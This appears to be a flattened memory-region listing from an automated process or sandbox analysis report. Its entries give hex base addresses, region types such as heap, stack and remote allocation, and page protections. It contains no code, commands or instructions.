||
|
750000
|
heap
|
page read and write
|
||
|
29266146000
|
heap
|
page read and write
|
||
|
29266169000
|
heap
|
page read and write
|
||
|
697000
|
heap
|
page read and write
|
||
|
7FFD9B6C2000
|
trusted library allocation
|
page read and write
|
||
|
1FC71000
|
direct allocation
|
page execute and read and write
|
||
|
4175000
|
heap
|
page read and write
|
||
|
20186000
|
unclassified section
|
page execute and read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
72A0000
|
trusted library allocation
|
page read and write
|
||
|
112FE380000
|
heap
|
page execute and read and write
|
||
|
1F92D000
|
stack
|
page read and write
|
||
|
2926610B000
|
heap
|
page read and write
|
||
|
600000
|
direct allocation
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
724D000
|
stack
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
4760000
|
heap
|
page read and write
|
||
|
112E6A24000
|
trusted library allocation
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
1FA7E000
|
stack
|
page read and write
|
||
|
29266141000
|
heap
|
page read and write
|
||
|
1FEB0000
|
heap
|
page read and write
|
||
|
292680F5000
|
heap
|
page read and write
|
||
|
688000
|
heap
|
page read and write
|
||
|
4181000
|
heap
|
page read and write
|
||
|
6AE0000
|
direct allocation
|
page read and write
|
||
|
1F8EE000
|
stack
|
page read and write
|
||
|
2926617D000
|
heap
|
page read and write
|
||
|
4772000
|
heap
|
page read and write
|
||
|
4178000
|
heap
|
page read and write
|
||
|
4610000
|
heap
|
page read and write
|
||
|
416D000
|
heap
|
page read and write
|
||
|
292661A0000
|
heap
|
page read and write
|
||
|
413E000
|
stack
|
page read and write
|
||
|
29267E83000
|
heap
|
page read and write
|
||
|
29266128000
|
heap
|
page read and write
|
||
|
29266143000
|
heap
|
page read and write
|
||
|
68C000
|
heap
|
page read and write
|
||
|
6D4E000
|
stack
|
page read and write
|
||
|
7061000
|
heap
|
page read and write
|
||
|
1FFD2000
|
heap
|
page read and write
|
||
|
4169000
|
heap
|
page read and write
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
2926617D000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
112F61EA000
|
trusted library allocation
|
page read and write
|
||
|
4175000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
2AF0000
|
trusted library section
|
page read and write
|
||
|
80CB000
|
stack
|
page read and write
|
||
|
4661000
|
heap
|
page read and write
|
||
|
2926613B000
|
heap
|
page read and write
|
||
|
41D8000
|
heap
|
page read and write
|
||
|
8896F9000
|
stack
|
page read and write
|
||
|
1FFD9000
|
heap
|
page read and write
|
||
|
4178000
|
heap
|
page read and write
|
||
|
29266135000
|
heap
|
page read and write
|
||
|
8160000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DAD000
|
stack
|
page read and write
|
||
|
4167000
|
heap
|
page read and write
|
||
|
2B20000
|
trusted library allocation
|
page read and write
|
||
|
29268100000
|
heap
|
page read and write
|
||
|
29267E6A000
|
heap
|
page read and write
|
||
|
441C000
|
stack
|
page read and write
|
||
|
8BF000
|
unkown
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
4611000
|
heap
|
page read and write
|
||
|
8170000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
2B42000
|
trusted library allocation
|
page read and write
|
||
|
8EA000
|
heap
|
page read and write
|
||
|
1FD9A000
|
heap
|
page read and write
|
||
|
29267E82000
|
heap
|
page read and write
|
||
|
889839000
|
stack
|
page read and write
|
||
|
DC000
|
stack
|
page read and write
|
||
|
41B7000
|
heap
|
page read and write
|
||
|
4A4E000
|
unkown
|
page read and write
|
||
|
29266129000
|
heap
|
page read and write
|
||
|
6F5D000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F3D0000
|
direct allocation
|
page read and write
|
||
|
29266146000
|
heap
|
page read and write
|
||
|
4470000
|
trusted library allocation
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
1F470000
|
direct allocation
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
6C1A000
|
stack
|
page read and write
|
||
|
811D000
|
stack
|
page read and write
|
||
|
698E000
|
stack
|
page read and write
|
||
|
6B2000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
4960000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
815C000
|
stack
|
page read and write
|
||
|
6AF0000
|
direct allocation
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
29266285000
|
heap
|
page read and write
|
||
|
2926616A000
|
heap
|
page read and write
|
||
|
292660EC000
|
heap
|
page read and write
|
||
|
29266164000
|
heap
|
page read and write
|
||
|
6FE000
|
heap
|
page read and write
|
||
|
7FFD9B6C0000
|
trusted library allocation
|
page read and write
|
||
|
688000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
57B8000
|
trusted library allocation
|
page read and write
|
||
|
2920000
|
heap
|
page read and write
|
||
|
2926628D000
|
heap
|
page read and write
|
||
|
4161000
|
heap
|
page read and write
|
||
|
EF000
|
stack
|
page read and write
|
||
|
7E00000
|
heap
|
page read and write
|
||
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
4171000
|
heap
|
page read and write
|
||
|
416D000
|
heap
|
page read and write
|
||
|
4163000
|
heap
|
page read and write
|
||
|
4663000
|
heap
|
page read and write
|
||
|
44FE000
|
stack
|
page read and write
|
||
|
29266170000
|
heap
|
page read and write
|
||
|
29266135000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
29266134000
|
heap
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
4178000
|
heap
|
page read and write
|
||
|
476A000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
112F61DB000
|
trusted library allocation
|
page read and write
|
||
|
112FE5FA000
|
heap
|
page read and write
|
||
|
4774000
|
heap
|
page read and write
|
||
|
88973E000
|
stack
|
page read and write
|
||
|
29267E66000
|
heap
|
page read and write
|
||
|
29266172000
|
heap
|
page read and write
|
||
|
28F0000
|
heap
|
page read and write
|
||
|
29268102000
|
heap
|
page read and write
|
||
|
737B000
|
stack
|
page read and write
|
||
|
1F440000
|
direct allocation
|
page read and write
|
||
|
4A0000
|
heap
|
page read and write
|
||
|
2B29000
|
trusted library allocation
|
page read and write
|
||
|
88A68B000
|
stack
|
page read and write
|
||
|
5639000
|
trusted library allocation
|
page read and write
|
||
|
4170000
|
heap
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
29266169000
|
heap
|
page read and write
|
||
|
112E4510000
|
trusted library allocation
|
page read and write
|
||
|
28F4000
|
heap
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
112FE32B000
|
heap
|
page read and write
|
||
|
5611000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
2926617D000
|
heap
|
page read and write
|
||
|
7FFD9B6DB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
1FA2F000
|
stack
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
1F7D0000
|
heap
|
page read and write
|
||
|
41B7000
|
heap
|
page read and write
|
||
|
112E44F0000
|
trusted library allocation
|
page read and write
|
||
|
29266124000
|
heap
|
page read and write
|
||
|
112E6117000
|
trusted library allocation
|
page read and write
|
||
|
112FE35A000
|
heap
|
page read and write
|
||
|
29266129000
|
heap
|
page read and write
|
||
|
292660DB000
|
heap
|
page read and write
|
||
|
890000
|
trusted library allocation
|
page read and write
|
||
|
2B40000
|
trusted library allocation
|
page read and write
|
||
|
4161000
|
heap
|
page read and write
|
||
|
29266288000
|
heap
|
page read and write
|
||
|
1FF29000
|
heap
|
page read and write
|
||
|
112F5EF1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
F3000
|
stack
|
page read and write
|
||
|
625000
|
heap
|
page read and write
|
||
|
2ADF000
|
stack
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
83E0000
|
direct allocation
|
page read and write
|
||
|
4771000
|
heap
|
page read and write
|
||
|
4773000
|
heap
|
page read and write
|
||
|
29266146000
|
heap
|
page read and write
|
||
|
4170000
|
heap
|
page read and write
|
||
|
112E6A34000
|
trusted library allocation
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
112FE560000
|
heap
|
page read and write
|
||
|
1FC5B000
|
unclassified section
|
page execute and read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
29266167000
|
heap
|
page read and write
|
||
|
2926617D000
|
heap
|
page read and write
|
||
|
8895FE000
|
stack
|
page read and write
|
||
|
688000
|
heap
|
page read and write
|
||
|
699000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
2B13000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EF0000
|
trusted library allocation
|
page read and write
|
||
|
8400000
|
direct allocation
|
page read and write
|
||
|
25F0000
|
heap
|
page read and write
|
||
|
3083000
|
heap
|
page read and write
|
||
|
4165000
|
heap
|
page read and write
|
||
|
29266080000
|
heap
|
page read and write
|
||
|
29266127000
|
heap
|
page read and write
|
||
|
1F3F0000
|
direct allocation
|
page read and write
|
||
|
292660AE000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
6A2000
|
heap
|
page read and write
|
||
|
29266119000
|
heap
|
page read and write
|
||
|
10C000
|
stack
|
page read and write
|
||
|
29265F90000
|
heap
|
page read and write
|
||
|
4661000
|
heap
|
page read and write
|
||
|
E27DBFE000
|
stack
|
page read and write
|
||
|
304E000
|
unkown
|
page read and write
|
||
|
2926613E000
|
heap
|
page read and write
|
||
|
8E9000
|
heap
|
page read and write
|
||
|
6FE000
|
heap
|
page read and write
|
||
|
2B45000
|
trusted library allocation
|
page execute and read and write
|
||
|
112E5F73000
|
trusted library allocation
|
page read and write
|
||
|
2E3C000
|
stack
|
page read and write
|
||
|
7D07000
|
stack
|
page read and write
|
||
|
4174000
|
heap
|
page read and write
|
||
|
112E7D29000
|
trusted library allocation
|
page read and write
|
||
|
7260000
|
trusted library allocation
|
page execute and read and write
|
||
|
4161000
|
heap
|
page read and write
|
||
|
1C0000
|
heap
|
page readonly
|
||
|
28F8000
|
heap
|
page read and write
|
||
|
889273000
|
stack
|
page read and write
|
||
|
112FE5F8000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
2926610B000
|
heap
|
page read and write
|
||
|
29266146000
|
heap
|
page read and write
|
||
|
4765000
|
heap
|
page read and write
|
||
|
29266087000
|
heap
|
page read and write
|
||
|
112FE599000
|
heap
|
page read and write
|
||
|
29267E83000
|
heap
|
page read and write
|
||
|
6AD0000
|
direct allocation
|
page read and write
|
||
|
2BAE000
|
stack
|
page read and write
|
||
|
29266153000
|
heap
|
page read and write
|
||
|
1FD99000
|
heap
|
page read and write
|
||
|
1F9EE000
|
stack
|
page read and write
|
||
|
6C0000
|
heap
|
page read and write
|
||
|
112E432F000
|
heap
|
page read and write
|
||
|
8893FE000
|
stack
|
page read and write
|
||
|
625000
|
heap
|
page read and write
|
||
|
E27D8FE000
|
stack
|
page read and write
|
||
|
6F20000
|
heap
|
page execute and read and write
|
||
|
2010D000
|
unclassified section
|
page execute and read and write
|
||
|
2926611E000
|
heap
|
page read and write
|
||
|
1F400000
|
direct allocation
|
page read and write
|
||
|
E27E0FB000
|
stack
|
page read and write
|
||
|
29266126000
|
heap
|
page read and write
|
||
|
4171000
|
heap
|
page read and write
|
||
|
112FE5B2000
|
heap
|
page read and write
|
||
|
57A5000
|
trusted library allocation
|
page read and write
|
||
|
25ED000
|
stack
|
page read and write
|
||
|
7B3000
|
heap
|
page read and write
|
||
|
403F000
|
unkown
|
page read and write
|
||
|
4960000
|
trusted library allocation
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
2926628D000
|
heap
|
page read and write
|
||
|
4773000
|
heap
|
page read and write
|
||
|
29AD000
|
heap
|
page read and write
|
||
|
8897B6000
|
stack
|
page read and write
|
||
|
112FE617000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
112FE5C2000
|
heap
|
page read and write
|
||
|
1FFA3000
|
heap
|
page read and write
|
||
|
2926628E000
|
heap
|
page read and write
|
||
|
292660D2000
|
heap
|
page read and write
|
||
|
817A000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
6AB0000
|
direct allocation
|
page read and write
|
||
|
4174000
|
heap
|
page read and write
|
||
|
112FE2C7000
|
heap
|
page read and write
|
||
|
88A50E000
|
stack
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
6E20000
|
heap
|
page read and write
|
||
|
2926610B000
|
heap
|
page read and write
|
||
|
112E4500000
|
heap
|
page readonly
|
||
|
29267E63000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
1FC40000
|
unclassified section
|
page execute and read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
8040000
|
trusted library allocation
|
page read and write
|
||
|
4178000
|
heap
|
page read and write
|
||
|
E27DAFF000
|
stack
|
page read and write
|
||
|
2B60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B776000
|
trusted library allocation
|
page read and write
|
||
|
29268100000
|
heap
|
page read and write
|
||
|
7FFD9B8A5000
|
trusted library allocation
|
page read and write
|
||
|
29266180000
|
heap
|
page read and write
|
||
|
112FE335000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
4160000
|
heap
|
page read and write
|
||
|
699000
|
heap
|
page read and write
|
||
|
112E4280000
|
heap
|
page read and write
|
||
|
2926617D000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
29266171000
|
heap
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
292680F1000
|
heap
|
page read and write
|
||
|
7F00000
|
trusted library allocation
|
page read and write
|
||
|
83D0000
|
direct allocation
|
page read and write
|
||
|
1FEB1000
|
heap
|
page read and write
|
||
|
29266138000
|
heap
|
page read and write
|
||
|
45FE000
|
stack
|
page read and write
|
||
|
1F3E0000
|
direct allocation
|
page read and write
|
||
|
4169000
|
heap
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
8F0000
|
direct allocation
|
page read and write
|
||
|
2E75000
|
stack
|
page read and write
|
||
|
4161000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
112FE5FE000
|
heap
|
page read and write
|
||
|
88993E000
|
stack
|
page read and write
|
||
|
688000
|
heap
|
page read and write
|
||
|
112E44D0000
|
trusted library allocation
|
page read and write
|
||
|
699000
|
heap
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
1FF2A000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
29267E97000
|
heap
|
page read and write
|
||
|
8E7000
|
heap
|
page read and write
|
||
|
112E5EE5000
|
heap
|
page read and write
|
||
|
4661000
|
heap
|
page read and write
|
||
|
476D000
|
heap
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
112E5D5C000
|
heap
|
page read and write
|
||
|
112E7B3F000
|
trusted library allocation
|
page read and write
|
||
|
50A000
|
heap
|
page read and write
|
||
|
699000
|
heap
|
page read and write
|
||
|
2B30000
|
trusted library allocation
|
page read and write
|
||
|
6FEB000
|
heap
|
page read and write
|
||
|
4176000
|
heap
|
page read and write
|
||
|
83F0000
|
direct allocation
|
page read and write
|
||
|
29266122000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
292660EC000
|
heap
|
page read and write
|
||
|
112E7B45000
|
trusted library allocation
|
page read and write
|
||
|
2C2F000
|
stack
|
page read and write
|
||
|
688000
|
heap
|
page read and write
|
||
|
292660C6000
|
heap
|
page read and write
|
||
|
112E4590000
|
trusted library allocation
|
page read and write
|
||
|
29266130000
|
heap
|
page read and write
|
||
|
7FFD9B8A2000
|
trusted library allocation
|
page read and write
|
||
|
88967E000
|
stack
|
page read and write
|
||
|
29267E83000
|
heap
|
page read and write
|
||
|
29267E7E000
|
heap
|
page read and write
|
||
|
6A2000
|
heap
|
page read and write
|
||
|
29267E6A000
|
heap
|
page read and write
|
||
|
81A4000
|
heap
|
page read and write
|
||
|
1FD98000
|
heap
|
page read and write
|
||
|
4171000
|
heap
|
page read and write
|
||
|
88A58D000
|
stack
|
page read and write
|
||
|
4960000
|
trusted library allocation
|
page read and write
|
||
|
1FFA3000
|
heap
|
page read and write
|
||
|
112E45A0000
|
heap
|
page read and write
|
||
|
E27DCFF000
|
stack
|
page read and write
|
||
|
112E7C36000
|
trusted library allocation
|
page read and write
|
||
|
2926613E000
|
heap
|
page read and write
|
||
|
4784000
|
heap
|
page read and write
|
||
|
29267E61000
|
heap
|
page read and write
|
||
|
170000
|
heap
|
page readonly
|
||
|
445E000
|
stack
|
page read and write
|
||
|
889ABE000
|
stack
|
page read and write
|
||
|
2926616C000
|
heap
|
page read and write
|
||
|
1F430000
|
direct allocation
|
page read and write
|
||
|
2B14000
|
trusted library allocation
|
page read and write
|
||
|
41DF000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page readonly
|
||
|
625000
|
heap
|
page read and write
|
||
|
476A000
|
heap
|
page read and write
|
||
|
292680DD000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
2B00000
|
trusted library allocation
|
page read and write
|
||
|
4960000
|
trusted library allocation
|
page read and write
|
||
|
112E5EE0000
|
heap
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
6BDE000
|
stack
|
page read and write
|
||
|
29266288000
|
heap
|
page read and write
|
||
|
6F4D000
|
heap
|
page read and write
|
||
|
2926628E000
|
heap
|
page read and write
|
||
|
180000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
5DE000
|
stack
|
page read and write
|
||
|
2926628A000
|
heap
|
page read and write
|
||
|
1F410000
|
direct allocation
|
page read and write
|
||
|
29266171000
|
heap
|
page read and write
|
||
|
29266129000
|
heap
|
page read and write
|
||
|
112E4333000
|
heap
|
page read and write
|
||
|
29266118000
|
heap
|
page read and write
|
||
|
2926613E000
|
heap
|
page read and write
|
||
|
4960000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2953000
|
heap
|
page read and write
|
||
|
29267E61000
|
heap
|
page read and write
|
||
|
88937E000
|
stack
|
page read and write
|
||
|
4176000
|
heap
|
page read and write
|
||
|
29266116000
|
heap
|
page read and write
|
||
|
2926613E000
|
heap
|
page read and write
|
||
|
1EE000
|
unkown
|
page read and write
|
||
|
7D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
466A000
|
trusted library allocation
|
page read and write
|
||
|
112E636B000
|
trusted library allocation
|
page read and write
|
||
|
112FE3E0000
|
heap
|
page execute and read and write
|
||
|
7EC0000
|
trusted library allocation
|
page read and write
|
||
|
29266135000
|
heap
|
page read and write
|
||
|
112E432B000
|
heap
|
page read and write
|
||
|
476B000
|
heap
|
page read and write
|
||
|
E27D6FA000
|
stack
|
page read and write
|
||
|
7E6D000
|
stack
|
page read and write
|
||
|
29267E83000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
29266280000
|
heap
|
page read and write
|
||
|
4164000
|
heap
|
page read and write
|
||
|
112FE60F000
|
heap
|
page read and write
|
||
|
4769000
|
heap
|
page read and write
|
||
|
6F30000
|
trusted library allocation
|
page read and write
|
||
|
4160000
|
heap
|
page read and write
|
||
|
890000
|
trusted library allocation
|
page read and write
|
||
|
112E4345000
|
heap
|
page read and write
|
||
|
292680F3000
|
heap
|
page read and write
|
||
|
112E65D3000
|
trusted library allocation
|
page read and write
|
||
|
112E4325000
|
heap
|
page read and write
|
||
|
3B90000
|
remote allocation
|
page execute and read and write
|
||
|
625000
|
heap
|
page read and write
|
||
|
2926610B000
|
heap
|
page read and write
|
||
|
4178000
|
heap
|
page read and write
|
||
|
6A2000
|
heap
|
page read and write
|
||
|
676000
|
heap
|
page read and write
|
||
|
476A000
|
heap
|
page read and write
|
||
|
29267E60000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
8E0000
|
heap
|
page read and write
|
||
|
29267E66000
|
heap
|
page read and write
|
||
|
4769000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
308C000
|
heap
|
page read and write
|
||
|
2004B000
|
heap
|
page read and write
|
||
|
112E5EF1000
|
trusted library allocation
|
page read and write
|
||
|
6F40000
|
heap
|
page read and write
|
||
|
29A6000
|
heap
|
page read and write
|
||
|
4161000
|
heap
|
page read and write
|
||
|
8380000
|
trusted library allocation
|
page read and write
|
||
|
4B8F000
|
stack
|
page read and write
|
||
|
2900000
|
heap
|
page read and write
|
||
|
29266145000
|
heap
|
page read and write
|
||
|
29267E63000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
112E4379000
|
heap
|
page read and write
|
||
|
41A3000
|
heap
|
page read and write
|
||
|
2B3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
112F5EFF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
41B7000
|
heap
|
page read and write
|
||
|
808C000
|
stack
|
page read and write
|
||
|
8898B8000
|
stack
|
page read and write
|
||
|
29266169000
|
heap
|
page read and write
|
||
|
29266113000
|
heap
|
page read and write
|
||
|
112E7B5B000
|
trusted library allocation
|
page read and write
|
||
|
476A000
|
heap
|
page read and write
|
||
|
4169000
|
heap
|
page read and write
|
||
|
1FFD9000
|
heap
|
page read and write
|
||
|
65D000
|
heap
|
page read and write
|
||
|
292660EC000
|
heap
|
page read and write
|
||
|
8B60000
|
direct allocation
|
page execute and read and write
|
||
|
112E42EC000
|
heap
|
page read and write
|
||
|
2007C000
|
heap
|
page read and write
|
||
|
4161000
|
heap
|
page read and write
|
||
|
4171000
|
heap
|
page read and write
|
||
|
44B0000
|
heap
|
page read and write
|
||
|
7BD000
|
heap
|
page read and write
|
||
|
4768000
|
heap
|
page read and write
|
||
|
718E000
|
stack
|
page read and write
|
||
|
7F190000
|
trusted library allocation
|
page execute and read and write
|
||
|
29266171000
|
heap
|
page read and write
|
||
|
81B0000
|
heap
|
page read and write
|
||
|
7FFD9B7A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F450000
|
direct allocation
|
page read and write
|
||
|
7FFD9B8A7000
|
trusted library allocation
|
page read and write
|
||
|
1F8AE000
|
stack
|
page read and write
|
||
|
7FFD9B6C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C5E000
|
stack
|
page read and write
|
||
|
112E7452000
|
trusted library allocation
|
page read and write
|
||
|
4169000
|
heap
|
page read and write
|
||
|
4196000
|
heap
|
page read and write
|
||
|
112FE7F0000
|
heap
|
page read and write
|
||
|
6A9B000
|
stack
|
page read and write
|
||
|
4140000
|
heap
|
page read and write
|
||
|
112FE280000
|
heap
|
page read and write
|
||
|
625000
|
heap
|
page read and write
|
||
|
29266146000
|
heap
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8035000
|
trusted library allocation
|
page read and write
|
||
|
1FD98000
|
heap
|
page read and write
|
||
|
D7000
|
stack
|
page read and write
|
||
|
1F82E000
|
stack
|
page read and write
|
||
|
4176000
|
heap
|
page read and write
|
||
|
4774000
|
heap
|
page read and write
|
||
|
1FC70000
|
direct allocation
|
page read and write
|
||
|
2926611D000
|
heap
|
page read and write
|
||
|
112FE601000
|
heap
|
page read and write
|
||
|
476A000
|
heap
|
page read and write
|
||
|
112E4540000
|
trusted library allocation
|
page read and write
|
||
|
8440000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
29266127000
|
heap
|
page read and write
|
||
|
688000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
4A5000
|
heap
|
page read and write
|
||
|
E27DEFD000
|
stack
|
page read and write
|
||
|
29266288000
|
heap
|
page read and write
|
||
|
1FD20000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
60C000
|
heap
|
page read and write
|
||
|
416B000
|
heap
|
page read and write
|
||
|
292660AF000
|
heap
|
page read and write
|
||
|
1FFD2000
|
heap
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
2926610B000
|
heap
|
page read and write
|
||
|
29266161000
|
heap
|
page read and write
|
||
|
7EB0000
|
heap
|
page read and write
|
||
|
4769000
|
heap
|
page read and write
|
||
|
88947E000
|
stack
|
page read and write
|
||
|
688000
|
heap
|
page read and write
|
||
|
2BE8000
|
heap
|
page read and write
|
||
|
4768000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
4163000
|
heap
|
page read and write
|
||
|
112E6A21000
|
trusted library allocation
|
page read and write
|
||
|
1F420000
|
direct allocation
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
1F86F000
|
stack
|
page read and write
|
||
|
6B5D000
|
stack
|
page read and write
|
||
|
2A9E000
|
stack
|
page read and write
|
||
|
4530000
|
heap
|
page execute and read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
29267E83000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
6F38000
|
trusted library allocation
|
page read and write
|
||
|
6E0E000
|
stack
|
page read and write
|
||
|
6A6000
|
heap
|
page read and write
|
||
|
71CF000
|
stack
|
page read and write
|
||
|
29266144000
|
heap
|
page read and write
|
||
|
1FBCE000
|
stack
|
page read and write
|
||
|
4160000
|
heap
|
page read and write
|
||
|
2018C000
|
unclassified section
|
page execute and read and write
|
||
|
29267E76000
|
heap
|
page read and write
|
||
|
4611000
|
heap
|
page read and write
|
||
|
418A000
|
heap
|
page read and write
|
||
|
6B10000
|
direct allocation
|
page read and write
|
||
|
1FC86000
|
direct allocation
|
page execute and read and write
|
||
|
295F000
|
heap
|
page read and write
|
||
|
4170000
|
heap
|
page read and write
|
||
|
8199000
|
heap
|
page read and write
|
||
|
1FD98000
|
heap
|
page read and write
|
||
|
149000
|
stack
|
page read and write
|
||
|
88A60A000
|
stack
|
page read and write
|
||
|
4767000
|
trusted library allocation
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
4767000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
7BD000
|
heap
|
page read and write
|
||
|
29267E7E000
|
heap
|
page read and write
|
||
|
29267E6E000
|
heap
|
page read and write
|
||
|
4660000
|
heap
|
page read and write
|
||
|
43D000
|
stack
|
page read and write
|
||
|
29266135000
|
heap
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
476A000
|
heap
|
page read and write
|
||
|
29267E6B000
|
heap
|
page read and write
|
||
|
112E77F8000
|
trusted library allocation
|
page read and write
|
||
|
4600000
|
heap
|
page execute and read and write
|
||
|
458F000
|
heap
|
page read and write
|
||
|
112E4329000
|
heap
|
page read and write
|
||
|
112E6A47000
|
trusted library allocation
|
page read and write
|
||
|
6B00000
|
direct allocation
|
page read and write
|
||
|
45BE000
|
stack
|
page read and write
|
||
|
4761000
|
heap
|
page read and write
|
||
|
1FD21000
|
heap
|
page read and write
|
||
|
112FE2D5000
|
heap
|
page read and write
|
||
|
112E7B97000
|
trusted library allocation
|
page read and write
|
||
|
29266169000
|
heap
|
page read and write
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
4176000
|
heap
|
page read and write
|
||
|
1FC0F000
|
stack
|
page read and write
|
||
|
4187000
|
heap
|
page read and write
|
||
|
2926613E000
|
heap
|
page read and write
|
||
|
6FF9000
|
heap
|
page read and write
|
||
|
8430000
|
direct allocation
|
page read and write
|
||
|
625000
|
heap
|
page read and write
|
||
|
699000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
625000
|
heap
|
page read and write
|
||
|
112FE3E7000
|
heap
|
page execute and read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
|
2926615D000
|
heap
|
page read and write
|
||
|
7FFD9B6C4000
|
trusted library allocation
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
7FFD9B871000
|
trusted library allocation
|
page read and write
|
||
|
112E4250000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
81AC000
|
heap
|
